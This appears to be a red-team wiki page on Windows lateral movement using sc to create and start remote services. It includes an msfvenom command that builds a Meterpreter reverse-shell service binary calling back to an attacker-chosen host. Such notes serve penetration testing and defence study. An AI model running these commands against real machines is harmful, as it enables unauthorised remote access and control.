Service Control (SC)

Administrator rights on the target machine are mandatory.

The Service Controller (sc) proves particularly valuable for attackers, enabling task scheduling via SMB.

sc \\host.domain create ExampleService binpath= “c:\windows\system32\calc.exe”
sc \\host.domain start ExampleService

The caveat here is that the executable must specifically be a service binary. Service binaries differ in that they need to "register" with the Service Control Manager (SCM), and if not, they terminate execution. Hence, if a non-service binary is used for this purpose, it will come back as a brief agent/beacon for a moment and then terminate.

Directly creating an executable that runs as a service is possible:

CobaltStrike :

In Cobalt Strike, navigate to Attacks > Packages > Windows Executable (S), and select the Service Binary output type.

Metasploit :

Using msfvenom, specify the exe-service format:

msfvenom -p windows/meterpreter/reverse_tcp -f exe-service LHOST=<IP> LPORT=<PORT> -o service.exe

Last updated